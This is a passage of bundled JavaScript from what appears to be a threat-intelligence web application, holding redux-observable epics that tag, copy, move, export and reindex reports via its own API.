        if (name.length > __WEBPACK_IMPORTED_MODULE_24__constants_js__["b" /* MAX_TAG_LENGTH */]) message = 'Tag name must be less than ' + __WEBPACK_IMPORTED_MODULE_24__constants_js__["b" /* MAX_TAG_LENGTH */] + ' characters.';
        return { id: id, enclaveId: enclaveId, name: name };
      });
    });

    if (message) {
      return enclaveTagErrorMessageObservable(message);
    }

    var formattedBulkTagPayload = Object(__WEBPACK_IMPORTED_MODULE_30_modules_tags_utils__["formatTagsToBulk"])(enclaveTagCombinations, enclaveTagCombinationsForDeletion);

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_24__constants_js__["d" /* REPORTS_ENDPOINT */] + '/' + id + '/tags', formattedBulkTagPayload).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('response')).mergeMap(function (emptySuccessResponse) {
      /* Endpoint returns status:200 response null so we don't need its response payload, we just know we succeeded
      *  So we run the success actions on the request payload we sent.
      * */
      var allTagEnclavesMap = enclaveTagCombinations.concat(enclaveTagCombinationsForDeletion);
      var formattedBulkTagResponse = Object(__WEBPACK_IMPORTED_MODULE_30_modules_tags_utils__["formatBulkTagResponse"])(formattedBulkTagPayload, allTagEnclavesMap);

      var _formattedBulkTagResp = formattedBulkTagResponse.toJS(),
          addedTags = _formattedBulkTagResp.addedTags,
          removedTags = _formattedBulkTagResp.removedTags;

      var tagOperations = addedTags.map(function (tag) {
        return { type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["M" /* SET_ENCLAVE_TAG_SUCCESS */], payload: { id: id, tag: Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["Map"])(tag) } };
      }).concat(removedTags.map(function (tag) {
        return { type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["B" /* REMOVE_ENCLAVE_TAG_SUCCESS */], payload: { id: id, tag: Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["Map"])(tag) } };
      }));

      var successMessage = Object(__WEBPACK_IMPORTED_MODULE_30_modules_tags_utils__["bulkTagSuccessMessage"])(addedTags, removedTags);
      return alertOnSuccess && successMessage ? tagOperations.concat(Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["success"])(successMessage)) : tagOperations;
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["L" /* SET_ENCLAVE_TAG_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'Could not add enclave tag to report.' }
        }
      });
    });
  });
};

var attributeEpic = function attributeEpic(action$, store, _ref10) {
  var ajax = _ref10.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["E" /* SET_ATTRIBUTE */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).mergeMap(function (_ref11) {
    var id = _ref11.id,
        name = _ref11.name;

    if (name.length > 32) {
      var err = new Error('Attribute exceeded 32 characters.');
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["F" /* SET_ATTRIBUTE_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: err.message }
        }
      });
    }

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_24__constants_js__["d" /* REPORTS_ENDPOINT */] + '/' + id + '/public-tags', Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["fromJS"])({ name: name })) // TODO: Why use fromJS here?
    .map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('response')).filter(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["isObject"]) // TODO: Is this check necessary? What might the server return?
    .map(function (x) {
      return reportFromJson(x, store.getState());
    }) // TODO: This is store-level logic. The fact that it's still here is legacy
    .map(function (tag) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["G" /* SET_ATTRIBUTE_SUCCESS */],
        payload: { id: id, tag: tag }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["F" /* SET_ATTRIBUTE_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'Could not add attribute to report.' }
        }
      });
    });
  });
};

/**
 * Fetch report metadata
 *
 * NOTE: Flatten and buffer. 5 is arbitrary. For now this value just gets us 5
 * batches (25/5). We need to mergeMap into a buffered observable in order to
 * get non-multiples of 5 numbers in the final buffer. The completion signal is
 * key here. If we buffered on the outer observable if we ever came back with
 * any number of reports that was not a multiple of 5 then the remainder would
 * simply never fire a full buffer off. They would be buffered but without a
 * complete signal never released since the buffer of 5 was never filled.
 *
 * NOTE: I added caching here so that we could simply dispatch a FETCH_METADATA
 * without worrying about whether or not it had already been fetched. However, if
 * `cacheDisabled` is true, the cache won't be used and the metadata will
 * be fetched from the server as usual.
 */
var fetchMetadataEpic = function fetchMetadataEpic(action$, store, _ref12) {
  var ajax = _ref12.ajax;

  return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].merge(action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["k" /* FETCH_METADATA */]).map(function (_ref13) {
    var payload = _ref13.payload,
        meta = _ref13.meta;
    return { payload: payload, meta: meta };
  }), __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].merge(action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["j" /* FETCH_LIST_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).map(__WEBPACK_IMPORTED_MODULE_29__utils__["reportIdsFromList"]), action$.ofType(__WEBPACK_IMPORTED_MODULE_18_modules_search_action_types__["l" /* FETCH_REPORTS_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).map(function (d) {
    return d.get('data').keySeq().toList();
  }), action$.ofType(__WEBPACK_IMPORTED_MODULE_18_modules_search_action_types__["p" /* SEARCH_REPORTS_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).map(function (d) {
    return d.get('items').map(function (item) {
      return item.get('guid');
    });
  })).map(function (ids) {
    return { payload: ids };
  })).mergeMap(function (_ref14) {
    var payload = _ref14.payload,
        _ref14$meta = _ref14.meta,
        meta = _ref14$meta === undefined ? {} : _ref14$meta;

    var getMetadata = function getMetadata(reportIds) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from(ajax.get(Object(__WEBPACK_IMPORTED_MODULE_29__utils__["metadataUrl"])(reportIds)).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('response')));
    };

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].if(function () {
      return meta.cacheDisabled;
    }, getMetadata(payload).map(function (metadata) {
      return __WEBPACK_IMPORTED_MODULE_13__actions__["fetchReportMetadataSuccess"](metadata);
    }).catch(function (error) {
      return __WEBPACK_IMPORTED_MODULE_13__actions__["fetchReportMetadataFailure"](error);
    }), __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(payload).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["filter"])(function (id) {
      return !Object(__WEBPACK_IMPORTED_MODULE_25__getters_js__["metadataCache"])(store.getState()).get(id);
    })).mergeMap(function (ids) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].if(function () {
        return ids.size === 0;
      }, Object(__WEBPACK_IMPORTED_MODULE_1_rxjs_operators__["mapTo"])({ type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["g" /* FETCH_DATA_ALREADY_CACHED */] }), __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(ids));
    }).mergeMap(function (ids) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from(ids).bufferCount(10);
    }) // See NOTE.
    .mergeMap(function (batch) {
      return getMetadata(batch);
    }).map(function (metadata) {
      return __WEBPACK_IMPORTED_MODULE_13__actions__["fetchReportMetadataSuccess"](metadata);
    }).catch(function (error) {
      return __WEBPACK_IMPORTED_MODULE_13__actions__["fetchReportMetadataFailure"](error);
    }));
  }).catch(function (error) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(__WEBPACK_IMPORTED_MODULE_13__actions__["fetchReportMetadataFailure"](error));
  });
};

/* Sets display options for reports */
var setFetchOptionsEpic = function setFetchOptionsEpic(action$, store, _ref15) {
  var ajax = _ref15.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["r" /* REFETCH_REPORTS */], __WEBPACK_IMPORTED_MODULE_11__action_types_js__["I" /* SET_DISPLAY_OPTIONS */], __WEBPACK_IMPORTED_MODULE_14_modules_create_action_types_js__["REPORT_PROCESSED"]).combineLatest(action$.ofType(__WEBPACK_IMPORTED_MODULE_23_modules_enclave_action_types_js__["f" /* FETCH_SUCCESS */])).mergeMap(function () {
    var state = store.getState();
    var options = Object(__WEBPACK_IMPORTED_MODULE_25__getters_js__["displayOptions"])(state);
    var enclaveFilters = Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["fromJS"])(options.enclaveFilters).toList().map(function (id) {
      return Object(__WEBPACK_IMPORTED_MODULE_21_modules_enclave_getters_js__["enclave"])(id)(state);
    });

    var searchDto = {
      startPage: options.page,
      pageSize: __WEBPACK_IMPORTED_MODULE_24__constants_js__["c" /* PAGE_SIZE */],
      sortDirection: 'DESC',
      sortFields: ['updated'],
      enclaveFilters: enclaveFilters,
      tags: options.tags,
      excludedTags: options.excludedTags,
      includeCommunity: options.includeCommunity
    };

    var validDistribution = options.includeCommunity || enclaveFilters.size > 0;

    if (!validDistribution) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["warn"])('Update selection filters to see results.'));
    } else {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["h" /* FETCH_LIST */], payload: searchDto });
    }
  });
};

var removeEnclaveTagEpic = function removeEnclaveTagEpic(action$, store, _ref16) {
  var ajax = _ref16.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["z" /* REMOVE_ENCLAVE_TAG */]).mergeMap(function (_ref17) {
    var _ref17$payload = _ref17.payload,
        reportId = _ref17$payload.reportId,
        tagName = _ref17$payload.tagName;

    return ajax.delete(__WEBPACK_IMPORTED_MODULE_24__constants_js__["d" /* REPORTS_ENDPOINT */] + '/' + reportId + '/enclave-tags/' + tagName).mergeMap(function () {
      return [{ type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["B" /* REMOVE_ENCLAVE_TAG_SUCCESS */], payload: { reportId: reportId, tagName: tagName } }, { type: __WEBPACK_IMPORTED_MODULE_12_modules_tags_action_types__["h" /* FETCH_ENCLAVE_TAGS */] }];
    }).catch(function (err) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["A" /* REMOVE_ENCLAVE_TAG_FAILURE */],
        meta: {
          alert: { type: 'error', text: 'Could not remove enclave tag from report' }
        }
      };
    });
  });
};

var removeAttributeEpic = function removeAttributeEpic(action$, store, _ref18) {
  var ajax = _ref18.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["w" /* REMOVE_ATTRIBUTE */]).mergeMap(function (_ref19) {
    var _ref19$payload = _ref19.payload,
        reportId = _ref19$payload.reportId,
        tagName = _ref19$payload.tagName;

    return ajax.delete(__WEBPACK_IMPORTED_MODULE_24__constants_js__["d" /* REPORTS_ENDPOINT */] + '/' + reportId + '/public-tags/' + tagName).mapTo({
      type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["y" /* REMOVE_ATTRIBUTE_SUCCESS */],
      payload: { reportId: reportId, tagName: tagName }
    }).catch(function (err) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["x" /* REMOVE_ATTRIBUTE_FAILURE */],
        meta: {
          alert: { type: 'error', text: 'Could not remove attribute from report' }
        }
      };
    });
  });
};

var removeReportEpic = function removeReportEpic(action$, store, _ref20) {
  var ajax = _ref20.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["v" /* REMOVE */]).mergeMap(function (_ref21) {
    var id = _ref21.payload;

    return ajax.delete(__WEBPACK_IMPORTED_MODULE_24__constants_js__["d" /* REPORTS_ENDPOINT */] + '/' + id).mergeMap(function () {
      return [{ type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["D" /* REMOVE_SUCCESS */], payload: id }, Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["success"])('Successfully deleted report')];
    }).catch(function (err) {
      return {
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["C" /* REMOVE_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'Could not delete report' }
        }
      };
    });
  });
};

/* Submission Service Additions to API */
var copyReportEpic = function copyReportEpic(action$, store, _ref22) {
  var ajax = _ref22.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["c" /* COPY_REPORT */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).mergeMap(function (_ref23) {
    var destEnclaveGuid = _ref23.destEnclaveGuid,
        reportId = _ref23.reportId,
        _ref23$copyFromProvid = _ref23.copyFromProvidedSubmission,
        copyFromProvidedSubmission = _ref23$copyFromProvid === undefined ? false : _ref23$copyFromProvid,
        _ref23$reportJSON = _ref23.reportJSON,
        reportJSON = _ref23$reportJSON === undefined ? null : _ref23$reportJSON;


    /* If this is a complex report, load the report data for pre-copy editing and send to the update page
        If reportJSON already exists then that means we have already done the editing and are now ready
        to send the edited payload to be copied
        TODO:SubmissionService Has report already been copied? Phase II
    */

    if (copyFromProvidedSubmission && !reportJSON) {
      var updateLink = '/update/' + reportId + '/enclave/' + destEnclaveGuid;
      var loadReportDataAction = {
        type: __WEBPACK_IMPORTED_MODULE_19_modules_create_action_types__["LOAD_REPORT_DATA"],
        payload: { guid: reportId }
      };
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([loadReportDataAction, Object(__WEBPACK_IMPORTED_MODULE_3_react_router_redux__["replace"])(updateLink)]);
    }

    var fullReportMap = copyFromProvidedSubmission ? reportJSON || Object(__WEBPACK_IMPORTED_MODULE_25__getters_js__["currentReportOrListItem"])(store.getState()) : null;
    var copyPayload = copyFromProvidedSubmission && fullReportMap ? Object(__WEBPACK_IMPORTED_MODULE_31_modules_create_utils__["d" /* toJSON */])(fullReportMap) : null;
    var queryParams = 'destEnclaveGuid=' + destEnclaveGuid + '&copyFromProvidedSubmission=' + copyFromProvidedSubmission.toString();

    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_24__constants_js__["d" /* REPORTS_ENDPOINT */] + '/copy/' + reportId + '?' + queryParams, copyPayload).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('response')).mergeMap(function (response) {
      var enclavesStore = Object(__WEBPACK_IMPORTED_MODULE_21_modules_enclave_getters_js__["enclavesMap"])(store.getState());
      var destinationEnclaveName = enclavesStore.get(destEnclaveGuid).get('name');
      var copiedReportLink = '/constellation/reports/' + response.id;

      // TODO:SUBMISSION REFACTOR ASAP
      var successMessageTemplate = {
        type: __WEBPACK_IMPORTED_MODULE_32_modules_alerts_action_types__["a" /* ADD_ALERT */],
        payload: { type: 'success', text: 'boo', htmlMessage: __WEBPACK_IMPORTED_MODULE_33_react___default.a.createElement(
            'span',
            null,
            ' New Copy ',
            __WEBPACK_IMPORTED_MODULE_33_react___default.a.createElement(
              'a',
              { href: copiedReportLink },
              ' ',
              response.id,
              ' '
            ),
            ' created in Enclave: ',
            destinationEnclaveName
          ) }
      };

      var postOpActions = [{
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["e" /* COPY_REPORT_SUCCESS */],
        payload: response
      }, successMessageTemplate];

      if (reportJSON) {
        var originalReportRoute = '/constellation/reports/' + reportId;
        postOpActions.push(Object(__WEBPACK_IMPORTED_MODULE_3_react_router_redux__["replace"])(originalReportRoute));
      }

      return postOpActions;
    }).catch(function (err) {
      console.error(err);
      var errorMessage = err.status === 403 ? 'You do not have the required permissions to copy to this enclave' : 'Could not copy report, if this problem persists contact support';
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["d" /* COPY_REPORT_FAILURE */],
        meta: {
          alert: { type: 'error', text: errorMessage }
        }
      });
    });
  }).catch(function (err) {
    console.error(err);
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["d" /* COPY_REPORT_FAILURE */],
      meta: {
        alert: { type: 'error', text: 'Could not copy report, if this problem persists contact support' }
      }
    });
  });
};

var moveReportEpic = function moveReportEpic(action$, store, _ref24) {
  var ajax = _ref24.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["o" /* MOVE_REPORT */]).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('payload')).mergeMap(function (_ref25) {
    var destEnclaveGuid = _ref25.destEnclaveGuid,
        reportId = _ref25.reportId;


    var queryParams = 'destEnclaveGuid=' + destEnclaveGuid;
    return ajax.postJSON(__WEBPACK_IMPORTED_MODULE_24__constants_js__["d" /* REPORTS_ENDPOINT */] + '/move/' + reportId + '?' + queryParams).map(Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["prop"])('response')).mergeMap(function (response) {
      return [{
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["q" /* MOVE_REPORT_SUCCESS */],
        payload: response
      }, Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["success"])('Report moved to enclave ' + destEnclaveGuid + ' successfully')];
    }).catch(function (err) {
      var errorMessage = err.status === 403 ? 'You do not have the required permissions to move to this enclave' : 'Could not move report, if this problem persists contact support';
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["p" /* MOVE_REPORT_FAILURE */],
        meta: {
          alert: { type: 'error', text: errorMessage }
        }
      });
    });
  }).catch(function (err) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["p" /* MOVE_REPORT_FAILURE */],
      meta: {
        alert: { type: 'error', text: 'Could not move report, if this problem persists contact support' }
      }
    });
  });
};

/**
 * If users set their browsers to block any files from downloading then the following functions
 * can still be succeffully invoked but no files will be downloaded
 *
 * NOTE: Not yet tested directly without axios, but manually issuing a request
 * worked fine in the browser. Example:
 * ajax.get('http://localhost:9090/services/incident-reports/970dd7d8-507d-4975-837f-6082e1db0aa8/download.json')
 **/
var exportReportsEpic = function exportReportsEpic(action$, store, _ref26) {
  var ajax = _ref26.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["f" /* EXPORT_REPORT */]).mergeMap(function (_ref27) {
    var _ref27$payload = _ref27.payload,
        id = _ref27$payload.id,
        format = _ref27$payload.format;

    return ajax.get(__WEBPACK_IMPORTED_MODULE_24__constants_js__["d" /* REPORTS_ENDPOINT */] + '/' + id + '/download.' + format, {}, { responseType: 'text' }).do(function (_ref28) {
      var response = _ref28.response;

      var filename = 'report-' + id + '.' + (format === 'fire_eye' ? 'csv' : format);
      Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["saveTextToFile"])(filename, response);
    }).ignoreElements().catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["error"])('Could not export report in ' + format + ' format.'));
    });
  });
};

var reindexReportEpic = function reindexReportEpic(action$, store, _ref29) {
  var ajax = _ref29.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_11__action_types_js__["s" /* REINDEX */]).do(function () {
    return store.dispatch(Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["warn"])('Reindexing report...'));
  }).mergeMap(function (_ref30) {
    var id = _ref30.payload;

    return ajax.get('/services/incident-reports/reprocess/' + id).mergeMap(function (response) {
      var nodes = __WEBPACK_IMPORTED_MODULE_15_modules_constellation__["c" /* getters */].currentGraph(store.getState()).getIn(['data', 'nodes']).toList().map(function (x) {
        return x.get('id');
      });
      return Object(__WEBPACK_IMPORTED_MODULE_26_modules_constellation_epics_js__["b" /* recordFetchById */])(id, ajax).mergeMap(function (_ref31) {
        var response = _ref31.response;

        var newNodes = Object(__WEBPACK_IMPORTED_MODULE_4_immutable__["fromJS"])(response).get('nodes').map(function (x) {
          return x.get('id');
        });
        var nodesToRemove = nodes.filter(function (x) {
          return !newNodes.includes(x);
        });
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["u" /* REINDEX_SUCCESS */], payload: id }, Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["success"])('Successfully reindexed report'),
        /* Unclear if all of this is necessary: */
        __WEBPACK_IMPORTED_MODULE_15_modules_constellation__["a" /* actions */].replaceNodeSelection(nodesToRemove), __WEBPACK_IMPORTED_MODULE_15_modules_constellation__["a" /* actions */].deleteCurrentSelection(), __WEBPACK_IMPORTED_MODULE_15_modules_constellation__["a" /* actions */].replaceNodeSelection([id])]).delay(3000);
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([{ type: __WEBPACK_IMPORTED_MODULE_11__action_types_js__["t" /* REINDEX_FAILURE */] }, Object(__WEBPACK_IMPORTED_MODULE_28_modules_alerts_actions__["error"])('Could not reindex report')]);
    });
  }).catch(handleError);
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_2_redux_observable__["combineEpics"])(setFetchOptionsEpic, copyReportEpic, fetchMetadataEpic, setEnclaveTagsBulk, pollReportAndStore, fetchAndStoreEpic, initializeEpic, moveReportEpic, attributeEpic, removeEnclaveTagEpic, removeAttributeEpic, removeReportEpic, exportReportsEpic, reindexReportEpic));

/***/ }),
/* 2962 */,
/* 2963 */,
/* 2964 */,
/* 2965 */,
/* 2966 */,
/* 2967 */,
/* 2968 */,
/* 2969 */,
/* 2970 */,
/* 2971 */,
/* 2972 */,
/* 2973 */,
/* 2974 */,
/* 2975 */,
/* 2976 */,
/* 2977 */,
/* 2978 */,
/* 2979 */,
/* 2980 */,
/* 2981 */,
/* 2982 */,
/* 2983 */,
/* 2984 */,
/* 2985 */,
/* 2986 */,
/* 2987 */,
/* 2988 */,
/* 2989 */,
/* 2990 */,
/* 2991 */,
/* 2992 */,
/* 2993 */,
/* 2994 */,
/* 2995 */,
/* 2996 */,
/* 2997 */,
/* 2998 */,
/* 2999 */,
/* 3000 */,
/* 3001 */,
/* 3002 */,
/* 3003 */,
/* 3004 */,
/* 3005 */,
/* 3006 */,
/* 3007 */,
/* 3008 */,
/* 3009 */,
/* 3010 */,
/* 3011 */,
/* 3012 */,
/* 3013 */,
/* 3014 */,
/* 3015 */,
/* 3016 */,
/* 3017 */,
/* 3018 */,
/* 3019 */,
/* 3020 */,
/* 3021 */,
/* 3022 */,
/* 3023 */,
/* 3024 */,
/* 3025 */,
/* 3026 */,
/* 3027 */,
/* 3028 */,
/* 3029 */,
/* 3030 */,
/* 3031 */,
/* 3032 */,
/* 3033 */,
/* 3034 */,
/* 3035 */,
/* 3036 */,
/* 3037 */,
/* 3038 */,
/* 3039 */,
/* 3040 */,
/* 3041 */,
/* 3042 */,
/* 3043 */,
/* 3044 */,
/* 3045 */,
/* 3046 */,
/* 3047 */,
/* 3048 */,
/* 3049 */,
/* 3050 */,
/* 3051 */,
/* 3052 */,
/* 3053 */,
/* 3054 */,
/* 3055 */,
/* 3056 */,
/* 3057 */,
/* 3058 */,
/* 3059 */,
/* 3060 */,
/* 3061 */,
/* 3062 */,
/* 3063 */,
/* 3064 */,
/* 3065 */,
/* 3066 */,
/* 3067 */,
/* 3068 */,
/* 3069 */,
/* 3070 */,
/* 3071 */,
/* 3072 */,
/* 3073 */,
/* 3074 */,
/* 3075 */,
/* 3076 */,
/* 3077 */,
/* 3078 */,
/* 3079 */,
/* 3080 */,
/* 3081 */,
/* 3082 */,
/* 3083 */,
/* 3084 */,
/* 3085 */,
/* 3086 */,
/* 3087 */,
/* 3088 */,
/* 3089 */,
/* 3090 */,
/* 3091 */,
/* 3092 */,
/* 3093 */,
/* 3094 */,
/* 3095 */,
/* 3096 */,
/* 3097 */,
/* 3098 */,
/* 3099 */,
/* 3100 */,
/* 3101 */,
/* 3102 */,
/* 3103 */,
/* 3104 */,
/* 3105 */,
/* 3106 */,
/* 3107 */,
/* 3108 */,
/* 3109 */,
/* 3110 */,
/* 3111 */,
/* 3112 */,
/* 3113 */,
/* 3114 */,
/* 3115 */,
/* 3116 */,
/* 3117 */,
/* 3118 */,
/* 3119 */,
/* 3120 */,
/* 3121 */,
/* 3122 */,
/* 3123 */,
/* 3124 */,
/* 3125 */,
/* 3126 */,
/* 3127 */,
/* 3128 */,
/* 3129 */,
/* 3130 */,
/* 3131 */,
/* 3132 */,
/* 3133 */,
/* 3134 */,
/* 3135 */,
/* 3136 */,
/* 3137 */,
/* 3138 */,
/* 3139 */,
/* 3140 */,
/* 3141 */,
/* 3142 */,
/* 3143 */,
/* 3144 */,
/* 3145 */,
/* 3146 */,
/* 3147 */,
/* 3148 */,
/* 3149 */,
/* 3150 */,
/* 3151 */,
/* 3152 */,
/* 3153 */,
/* 3154 */,
/* 3155 */,
/* 3156 */,
/* 3157 */,
/* 3158 */,
/* 3159 */,
/* 3160 */,
/* 3161 */,
/* 3162 */,
/* 3163 */,
/* 3164 */,
/* 3165 */,
/* 3166 */,
/* 3167 */,
/* 3168 */,
/* 3169 */,
/* 3170 */,
/* 3171 */,
/* 3172 */,
/* 3173 */,
/* 3174 */,
/* 3175 */,
/* 3176 */,
/* 3177 */,
/* 3178 */,
/* 3179 */,
/* 3180 */,
/* 3181 */,
/* 3182 */,
/* 3183 */,
/* 3184 */,
/* 3185 */,
/* 3186 */,
/* 3187 */,
/* 3188 */,
/* 3189 */,
/* 3190 */,
/* 3191 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export CONSTELLATION_RESULTS_LIMIT */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return graphEndpoint; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return queryRecordParams; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return queryIndicatorParams; });
var CONSTELLATION_RESULTS_LIMIT = 500;

var graphEndpoint = function graphEndpoint() {
  return '/services/graph';
};

var queryRecordParams = {
  limit: 500,
  type: 'RECORD'
};

var queryIndicatorParams = {
  limit: 500,
  type: 'INDICATOR'
};

/***/ }),
/* 3192 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getInitialTimeRange", function() { return getInitialTimeRange; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "constellation", function() { return constellation; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "constellationMeta", function() { return constellationMeta; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_d3_array__ = __webpack_require__(103);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_date_fns_compare_desc__ = __webpack_require__(503);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_date_fns_compare_desc___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_date_fns_compare_desc__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_date_fns_min__ = __webpack_require__(1382);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_date_fns_min___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_date_fns_min__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_utils_utils_js__ = __webpack_require__(78);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_constellation_graph_utils_js__ = __webpack_require__(408);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_fp__ = __webpack_require__(109);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_9_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__action_types_js__ = __webpack_require__(143);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11_modules_analysis_action_types_js__ = __webpack_require__(372);
